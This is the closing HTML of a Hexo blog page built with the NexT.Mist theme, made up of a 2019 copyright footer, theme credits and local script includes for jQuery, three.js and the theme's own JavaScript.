    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">袁</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
